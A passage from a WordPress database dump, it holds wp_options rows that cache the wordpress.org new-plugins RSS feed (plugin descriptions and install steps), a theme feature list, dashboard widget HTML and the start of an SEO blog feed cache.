release</li>\n</ul>\n<p><!--section=faq--></p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<ol>\n<li>Download and activate the plugin.</li>\n<li>Browse to the <code>Log HTTP Requests</code> menu to view log entries.</li>\n</ol>\n</dd>\n</dl>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n		\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"AH About Widget\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"https://wordpress.org/plugins/ah-about-widget/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 19 Jul 2017 12:55:02 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://wordpress.org/plugins-wp/ah-about-widget/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:102:\"Easy to use &#34;About me&#34; profile widget with several settings, which is using your Author&#8230;\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"AndreasHecht\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1731:\"<p><!--section=description--></p>\n<p>Easy to use &#8220;About me&#8221; profile widget with several settings, which is using your Author Bio, Description and Author Gravatar. You can also link to your &#8220;About me&#8221; page.</p>\n<p>Gravatar can have alignment right, left and none. See Screenshots for more information. The Gravatar can have four different sizes: 45, 65, 85 and 125px.</p>\n<p>Alignment none plus Gravatar 125px will center the Gravatar and makes him round. CSS is tested on Twenty Sixteen, Twenty Fifteen, Twenty Fourteen and some other Themes.</p>\n<p><!--section=installation--></p>\n<ol>\n<li>Upload the plugin files to the <code>/wp-content/plugins/</code> directory, or install the plugin through the WordPress plugins screen directly.</li>\n<li>Activate the plugin through the &#8216;Plugins&#8217; screen in WordPress</li>\n<li>Ready to use!</li>\n</ol>\n<p><!--section=faq--></p>\n<ul>\n<li>Question 1: The CSS does not display the widget correctly, what can I do? </li>\n<li>Question 2: Can I use my own CSS?</li>\n</ul>\n<p><strong>Answer to both questions:</strong> You can override the plugin css. Go to the <a href=\"https://andreas-hecht.com/ah-about-widget/\" title=\"Ah About Widget Homepage\" rel=\"nofollow\">Widget Homepage</a>. There you will find a small tutorial about that.</p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<ol>\n<li>Upload the plugin files to the <code>/wp-content/plugins/</code> directory, or install the plugin through the WordPress plugins screen directly.</li>\n<li>Activate the plugin through the &#8216;Plugins&#8217; screen in WordPress</li>\n<li>Ready to use!</li>\n</ol>\n</dd>\n</dl>\n<p><!--section=changelog--></p>\n<h4>1.0.0</h4>\n<ul>\n<li>First release. Stable version.</li>\n</ul>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n		\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"Menu Restrict for Anonymous users\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/plugins/menu-restrict-for-anonymous-users/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 19 Jul 2017 12:45:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/plugins/menu-restrict-for-anonymous-users/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:103:\"This plugin restricted the seleted menu so anonymous user won&#039;t access this menu item links&#8230;\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Venugopal\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:938:\"<p><!--section=description--></p>\n<p>This plugin restricted the seleted menu so anonymous user won&#8217;t access this menu item links directly</p>\n<p><strong>More WordPress help please follow Me on this link</strong><br />\n<strong><a href=\"https://venugopalphp.wordpress.com/\" rel=\"nofollow\">Venugopal</a></strong></p>\n<p><!--section=installation--></p>\n<p>This section describes how to install the plugin and get it working.</p>\n<p>In WordPress:</p>\n<pre><code>Go to Plugins &gt; Add New &gt; search for : Menu Restrict for Anonymous users :\nPress Install Now for the Comment Date and Gravatar remover plugin\nPress Activate Plugin\n</code></pre>\n<p>To install manually instead:</p>\n<pre><code>Download zip file and Upload the directory to the /wp-content/plugins/ directory\nActivate the plugin through the Plugins menu in WordPress\n</code></pre>\n<p><!--section=changelog--></p>\n<h4>1.0</h4>\n<ul>\n<li>Created Menu restrict 1.0</li>\n</ul>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n		\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Sel Shortcodes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"https://wordpress.org/plugins/sel-shortcodes/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 19 Jul 2017 11:43:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"https://wordpress.org/plugins/sel-shortcodes/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"This plugin created for official themes from Selthemes.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Selthemes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:610:\"<p><!--section=description--></p>\n<p>This plugin generates following shortcodes on wp sites.<br />\n* Grid<br />\n* Button<br />\n* Callouts<br />\n* Accordion<br />\n* Tabs</p>\n<p><!--section=faq--></p>\n<dl>\n<dt>Installation Details</dt>\n<dd>\n<ol>\n<li>Upload &#8216;sel-shortcodes&#8217; to the &#8216;/wp-content/plugins/&#8217; directory</li>\n<li>Activate the plugin through the &#8216;Plugins&#8217; menu in WordPress.</li>\n</ol>\n</dd>\n<dt>Can I use this plugin with “non-selthemes” themes?</dt>\n<dd>\n<p>Yes.</p>\n</dd>\n</dl>\n<p><!--section=changelog--></p>\n<h4>1.0</h4>\n<ul>\n<li>Initial release.</li>\n</ul>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n		\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"Woo Shop Front Customizer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/plugins/woo-shop-front-customizer/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 19 Jul 2017 11:05:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/plugins/woo-shop-front-customizer/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"Admin can manage Shop and product detail page element with the help of this plugin.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"the_wpexperts\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2189:\"<p><!--section=description--></p>\n<p>Admin can Show / Hide elements of Shop and product detail page with the help of this plugin.</p>\n<p><!--section=installation--></p>\n<ul>\n<li>Download the Plugin (in a zip file) on your system</li>\n<li>In the Admin Panel click on Plugin and select ‘Add New’ from the sub menu</li>\n<li>In the next screen Upload the plugin by browsing to the location where you have downloaded the plugin</li>\n<li>Activate the plugin through the &#8216;Plugins&#8217; menu in WordPress</li>\n</ul>\n<p>Or</p>\n<ul>\n<li>Upload the woo-shop-front-customizer (directory included) to the /wp-content/plugins/ directory</li>\n<li>Activate the plugin through the &#8216;Plugins&#8217; menu in WordPress</li>\n</ul>\n<p><!--section=faq--></p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<ul>\n<li>Download the Plugin (in a zip file) on your system</li>\n<li>In the Admin Panel click on Plugin and select ‘Add New’ from the sub menu</li>\n<li>In the next screen Upload the plugin by browsing to the location where you have downloaded the plugin</li>\n<li>Activate the plugin through the &#8216;Plugins&#8217; menu in WordPress</li>\n</ul>\n<p>Or</p>\n<ul>\n<li>Upload the woo-shop-front-customizer (directory included) to the /wp-content/plugins/ directory</li>\n<li>Activate the plugin through the &#8216;Plugins&#8217; menu in WordPress</li>\n</ul>\n</dd>\n<dt>Which versions of WooCommerce does this plugin support?</dt>\n<dd>\n<p>Woo Shop Front Customizer Popup  plugin is compatible with all the versions of WooCommerce. In case you face any issues, please write to us with its detailed description.</p>\n</dd>\n<dt>I am unable to download the Plugin.</dt>\n<dd>\n<p>Sometimes internet speed or some server related issue can cause a delay. Wait for a few moments and try again. Alternatively, check for any proxy related settings that might be interfering with the download.</p>\n</dd>\n<dt>I have some suggestions regarding the plugin.</dt>\n<dd>\n<p>All the suggestions and feedbacks are welcomed. Please send your suggestions to us at the details mentioned in contact us section. We’ll be glad to hear from you.</p>\n</dd>\n<dt>1.0</dt>\n<dd>\n<ul>\n<li>Initial version</li>\n</ul>\n</dd>\n</dl>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n		\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"Custom Bulleted Lists\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://wordpress.org/plugins/custom-bulleted-lists/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 19 Jul 2017 10:39:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://wordpress.org/plugins/custom-bulleted-lists/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:95:\"Custom Bullet Lists: Write attractive and visually appealing content using custom bullet lists.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"Janmejai Pratap Singh\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1272:\"<p><!--section=description--></p>\n<p>WordPress provides basic bullet list options. But, they are basic in nature and are not visually appealing.</p>\n<p>With Custom Bullet Lists for WordPress, you will get custom bullet styles in your post editor to use in your content. The plugin is easy to use and requires no coding, you can use the custom bullet styles from your post editor in the same way, as you use the default bullet lists.</p>\n<p>You can see <a href=\"https://abcofwp.com/custom-bullet-lists-wordpress/\" rel=\"nofollow\">demo of the bullet lists</a>.</p>\n<p>Currently, the plugin provides 7 styles for bullet lists. I&#8217;ll welcome <a href=\"https://abcofwp.com/custom-bullet-lists-wordpress/\" rel=\"nofollow\">suggestion regarding more styles</a>, however, the icons should be available in WordPress Dashicons and should be something that can be used by everyone.</p>\n<h4>Features</h4>\n<ol>\n<li>7 Styles of bullet options.</li>\n<li>Uses WordPress dashicons provided by WordPress.</li>\n<li>As it uses Dashicons, the plugin is lightweight.</li>\n<li>Doesn&#8217;t uses images like other plugins. </li>\n<li>Easy to use, no coding required.</li>\n</ol>\n<p><!--section=changelog--></p>\n<h4>1.0</h4>\n<p>Release Date: July 18th, 2017</p>\n<ul>\n<li>Intial Version</li>\n</ul>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n		\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"WP Perfect Image Cropper and Resizer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/plugins/wp-perfect-image-cropper-and-resizer/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 19 Jul 2017 10:35:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/plugins/wp-perfect-image-cropper-and-resizer/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:103:\"Generate perfect images for posts, pages or WooCommerce products. Provide a max width and height&#8230;\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"expresstech\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1276:\"<p><!--section=description--></p>\n<p>This plugin helps you to generate perfect images for your Posts, Pages and (WooCommerce) Products.</p>\n<p>Generally, you loose image content while uploading due to various sizes and cropping. This plugin, however, while keeping the aspect ratio intact ALSO keeps the image content intact. It does it by adding whitespace padding where ever required.</p>\n<p>You can use this plugin to generate a perfect looking shop or blog with even images sizes.</p>\n<p><!--section=installation--></p>\n<ol>\n<li>Upload <code>wp-perfect-image-cropper-resizer.php</code> to the <code>/wp-content/plugins/</code> directory</li>\n<li>Activate the plugin through the &#8216;Plugins&#8217; menu in WordPress</li>\n<li>Place <code>&lt;?php do_action(\'plugin_name_hook\'); ?&gt;</code> in your templates</li>\n</ol>\n<p><!--section=changelog--></p>\n<h4>1.0</h4>\n<p>First version.</p>\n<p><!--section=faq--></p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<ol>\n<li>Upload <code>wp-perfect-image-cropper-resizer.php</code> to the <code>/wp-content/plugins/</code> directory</li>\n<li>Activate the plugin through the &#8216;Plugins&#8217; menu in WordPress</li>\n<li>Place <code>&lt;?php do_action(\'plugin_name_hook\'); ?&gt;</code> in your templates</li>\n</ol>\n</dd>\n</dl>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:46:\"https://wordpress.org/plugins/browse/new/feed/\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"hourly\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:10:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Wed, 19 Jul 2017 13:35:34 GMT\";s:12:\"content-type\";s:34:\"application/rss+xml; charset=UTF-8\";s:10:\"connection\";s:5:\"close\";s:25:\"strict-transport-security\";s:11:\"max-age=360\";s:6:\"x-olaf\";s:3:\"⛄\";s:13:\"last-modified\";s:29:\"Wed, 19 Jul 2017 13:23:32 GMT\";s:4:\"link\";s:66:\"<https://wordpress.org/plugins/wp-json/>; rel=\"https://api.w.org/\"\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 249\";}s:5:\"build\";s:14:\"20170719132742\";}', 'no'),
(121533, '_site_transient_timeout_wporg_theme_feature_list', '1500482344', 'yes'),
(121534, '_site_transient_wporg_theme_feature_list', 'a:5:{s:6:\"Colors\";a:15:{i:0;s:5:\"black\";i:1;s:4:\"blue\";i:2;s:5:\"brown\";i:3;s:4:\"gray\";i:4;s:5:\"green\";i:5;s:6:\"orange\";i:6;s:4:\"pink\";i:7;s:6:\"purple\";i:8;s:3:\"red\";i:9;s:6:\"silver\";i:10;s:3:\"tan\";i:11;s:5:\"white\";i:12;s:6:\"yellow\";i:13;s:4:\"dark\";i:14;s:5:\"light\";}s:7:\"Columns\";a:6:{i:0;s:10:\"one-column\";i:1;s:11:\"two-columns\";i:2;s:13:\"three-columns\";i:3;s:12:\"four-columns\";i:4;s:12:\"left-sidebar\";i:5;s:13:\"right-sidebar\";}s:8:\"Features\";a:19:{i:0;s:8:\"blavatar\";i:1;s:10:\"buddypress\";i:2;s:17:\"custom-background\";i:3;s:13:\"custom-colors\";i:4;s:13:\"custom-header\";i:5;s:11:\"custom-menu\";i:6;s:12:\"editor-style\";i:7;s:21:\"featured-image-header\";i:8;s:15:\"featured-images\";i:9;s:15:\"flexible-header\";i:10;s:20:\"front-page-post-form\";i:11;s:19:\"full-width-template\";i:12;s:12:\"microformats\";i:13;s:12:\"post-formats\";i:14;s:20:\"rtl-language-support\";i:15;s:11:\"sticky-post\";i:16;s:13:\"theme-options\";i:17;s:17:\"threaded-comments\";i:18;s:17:\"translation-ready\";}s:7:\"Subject\";a:3:{i:0;s:7:\"holiday\";i:1;s:13:\"photoblogging\";i:2;s:8:\"seasonal\";}s:5:\"Width\";a:2:{i:0;s:11:\"fixed-width\";i:1;s:14:\"flexible-width\";}}', 'yes'),
(121518, '_transient_timeout_dash_aa95765b5cc111c56d5993d476b1c2f0', '1500514530', 'no'),
(121525, '_transient_timeout_feed_mod_77fa140e07ce53fe8c87136636f83d72', '1500514535', 'no'),
(121526, '_transient_feed_mod_77fa140e07ce53fe8c87136636f83d72', '1500471335', 'no'),
(121529, '_transient_timeout_dash_de3249c4736ad3bd2cd29147c4a0d43e', '1500514535', 'no'),
(121530, '_transient_dash_de3249c4736ad3bd2cd29147c4a0d43e', '<h4>Most Popular</h4>\n<h5><a href=\'https://wordpress.org/plugins/limit-login-attempts/\'>Limit Login Attempts</a></h5>&nbsp;<span>(<a href=\'plugin-install.php?tab=plugin-information&amp;plugin=limit-login-attempts&amp;_wpnonce=0dcc3be870&amp;TB_iframe=true&amp;width=600&amp;height=800\' class=\'thickbox\' title=\'Limit Login Attempts\'>Install</a>)</span>\n<p>Limit rate of login attempts, including by way of cookies, for each IP. Fully customizable.</p>\n<h4>Newest Plugins</h4>\n<h5><a href=\'https://wordpress.org/plugins/ultimate-private-member-portal-lite/\'>Ultimate Private Member Portal Lite</a></h5>&nbsp;<span>(<a href=\'plugin-install.php?tab=plugin-information&amp;plugin=ultimate-private-member-portal-lite&amp;_wpnonce=fd4236a9da&amp;TB_iframe=true&amp;width=600&amp;height=800\' class=\'thickbox\' title=\'Ultimate Private Member Portal Lite\'>Install</a>)</span>\n<p>Ultimate Private Member Portal Lite provides the ability to add private content specific for each…</p>\n', 'no'),
(121532, '_transient_plugins_delete_result_1', '1', 'yes'),
(121547, 'WPLANG', '', 'yes'),
(121538, 'widget_calendar', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(121539, 'widget_media_audio', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(121540, 'widget_media_image', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(121541, 'widget_media_video', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(121542, 'widget_nav_menu', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(121504, '_transient_timeout_rss_da8c757f762dcd1ec67339593414ea85', '1500474902', 'no');
INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(121505, '_transient_rss_da8c757f762dcd1ec67339593414ea85', 'O:9:\"MagpieRSS\":19:{s:6:\"parser\";i:0;s:12:\"current_item\";a:0:{}s:5:\"items\";a:10:{i:0;a:13:{s:5:\"title\";s:44:\"Topical Relevance, SEO and Keyword Stemming!\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/5s6Rr3nWUss/\";s:8:\"category\";s:129:\"ArticlesKeyword Stemming and SEOSearch Engine Relevance ModelSEO and Contextual RelevanceSEO and Topical RelevanceUnique Keywords\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Fri, 19 May 2017 00:59:15 PDT\";s:4:\"guid\";s:91:\"http://www.seodesignsolutions.com/blog/articles/topical-relevance-seo-and-keyword-stemming/\";s:7:\"content\";a:1:{s:7:\"encoded\";s:8050:\"<p>For the purpose of <a href=\"http://www.seodesignsolutions.com/\"><a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/search-engine-optimization-2/\'>SEO</a></a>, context is a definitive factor that can (1) elevate your website past others competing for similar or related keywords (2) build topical <a href=\"http://seodesignsolutions.com/blog/seo/develop-domain-authority/\">domain authority</a> and (3) increase conversion by having a higher number of pages occupying a larger percentage of market share for <a href=\"http://seodesignsolutions.com/blog/seo-basics/using-related-search-to-find-googles-most-search-keywords/\">related keywords</a> and queries.</p>\n<div id=\"attachment_2549\" style=\"width: 435px\" class=\"wp-caption 